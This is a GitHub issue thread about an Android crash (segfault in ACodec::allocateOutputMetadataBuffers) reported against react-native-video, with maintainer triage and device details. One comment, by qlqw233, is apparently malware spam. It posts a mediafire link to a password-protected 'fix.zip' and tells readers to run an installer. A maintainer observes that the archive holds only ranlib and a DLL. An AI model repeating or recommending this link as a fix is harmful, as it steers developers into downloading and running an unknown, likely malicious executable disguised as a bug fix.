### ISSUE TITLE
[BUG]: CRASH: android::ACodec::allocateOutputMetadataBuffers

### ISSUE THREAD

**Issue by forchello** [TheWidlarzGroup/react-native-video#4115]
### Version

6.4.5

### What platforms are you having the problem on?

Android

### System Version

android 11+

### On what device are you experiencing the issue?

Real device

### Architecture

Old architecture

### What happened?

I have got crash in sentry: 
Segfault: android::ACodec::allocateOutputMetadataBuffers

### Reproduction

Unfortunately I don't know how to reproduce this, but I have a link to the android google media framework where the error occurred: https://android.googlesource.com/platform/frameworks/av/+/master/media/libstagefright/ACodec.cpp#:~:text=err%20%3D-,allocateOutputMetadataBuffers,-()%3B

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by freeboub** [comment]
Can you please provide the full callstack ? 
Is there any platform specificity with that issue (specific devices or android versions ?)
The zip file you provide only contains ranlib & a dll ...

**Comment by forchello** [comment]
> Can you please provide the full callstack ? Is there any platform specificity with that issue (specific devices or android versions ?) The zip file you provide only contains ranlib & a dll ...

That's just what I know:

Crashed: Thread 1
SIGSEGV 0x0000000000000008
libstagefright.so

It was BLU View 2 (B131DL) with android 11

**Comment by freeboub** [comment]
Looks like a device specific issue ...
Let me know if this is reproduced with other device please ? 
I will close the ticket as it cannot be investigate...
